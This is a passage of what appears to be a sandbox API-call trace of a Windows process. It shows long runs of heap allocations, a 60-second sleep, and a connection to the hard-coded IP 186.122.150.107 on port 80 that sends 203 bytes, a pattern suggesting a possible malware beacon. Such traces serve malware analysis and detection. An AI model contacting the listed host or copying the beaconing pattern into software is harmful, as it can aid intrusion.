RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bb938 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bbb60 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bc1d8 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bc400 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2653080 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2656ce0 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2655978 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2653920 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2652c30 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2656218 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2656440 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2656ab8 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2655528 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2652e58 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2656668 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26541c0 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26532a8 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2654a60 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2653b48 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2655ba0 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2654eb0 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26543e8 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26536f8 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2655750 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2656890 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26534d0 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2653d70 [0207.985] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e8ed0 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25ea938 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25ea320 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25eab40 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25ead48 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e82a0 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e90d8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7260 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7468 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e94e8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e84a8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7670 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e88b8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e86b0 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7878 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7c88 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25efc38 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f0fe8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f1bb8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f13d8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f15d0 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f0028 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25ef848 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f0bf8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f0220 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f2590 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f1fa8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f2b78 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f17c8 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f21a0 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25efa40 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25f0418 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2598e90 [0207.986] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265df30 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f9e0 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265e300 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f058 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f7f8 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2660368 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265eaa0 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265e4e8 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f610 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265ec88 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265ee70 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2660920 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265e118 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f240 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265f428 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2619998 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2619d48 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261c050 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2619f20 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261c400 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261c5d8 [0207.987] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261b190 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261a0f8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261a680 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261a858 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261b368 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261aa30 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2618cb0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261ade0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261c7b0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x261cb60 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f46d0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3338 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f4c28 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f5180 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3500 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f4fb8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3890 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3de8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3fb0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f4178 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f68a8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f3170 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f4340 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f56d8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f5348 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f6518 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2622cd0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26227a8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2622b18 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624f30 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624170 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624698 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624328 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624850 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624bc0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624d78 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2623fb8 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26244e0 [0207.988] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2624a08 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x261f0a8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26201d8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x261da50 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c96b0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c9a00 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cb480 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c9ef8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c9ba8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c8620 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c9d50 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ca0a0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c8128 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ca248 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ca3f0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cade0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ca740 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c8970 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ca598 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25c8b18 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2600f80 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fec70 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ff2d0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2600920 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2600458 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ffdf8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fead8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ff468 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ff600 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ff930 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ffac8 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25ffc60 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2601118 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26005f0 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fff90 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2600128 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606408 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606718 [0207.989] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26068a0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606a28 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606bb0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606280 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606d38 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2606ec0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26699a8 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2669388 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26688d0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2668748 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2668be0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2669b30 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2669510 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2669698 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2626650 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26267c8 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627dd0 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627210 [0207.990] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26257a0 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2626940 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2626ab8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627388 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2625ef8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26261e8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2626c30 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627ae0 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2626070 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627098 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2625918 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2627500 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266da80 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d0a8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d918 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d7b0 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d210 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266dd50 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266dbe8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266deb8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266e020 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266cf40 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d378 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d4e0 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266d648 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266a3a8 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266b488 [0207.991] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x266c568 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262b8c0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c788 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262cb90 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c8e0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262ce40 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262cce8 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262ca38 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262bf78 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262cf98 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c4d8 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262bcc8 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c630 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262be20 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c0d0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c228 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x262c380 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26419c0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26407d0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x263f350 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2641730 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x263f5e0 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x263f498 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2640540 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26403f8 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2640918 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2640a60 [0207.992] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2640e38 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26410c8 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2641878 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2641210 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x263f208 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2641358 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260bef8 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260ced0 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d008 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d4e8 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d140 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d3b0 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d758 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260b670 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260b2c8 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260ba18 [0207.993] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x266e860 [0208.001] Sleep (dwMilliseconds=0xea60) [0218.017] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0218.017] socket (af=2, type=1, protocol=6) returned 0x2bc [0218.019] htons (hostshort=0x50) returned 0x5000 [0218.019] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0218.019] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0218.021] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0218.021] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0218.021] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0218.021] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0218.278] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0218.278] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0218.564] closesocket (s=0x2bc) returned 0 [0218.565] WSACleanup () returned 0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264eb80 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2650e00 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264f1f8 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264fcc0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264fa98 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264f420 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2651250 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264eda8 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2650110 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2651478 [0218.565] RtlAllocateHeap 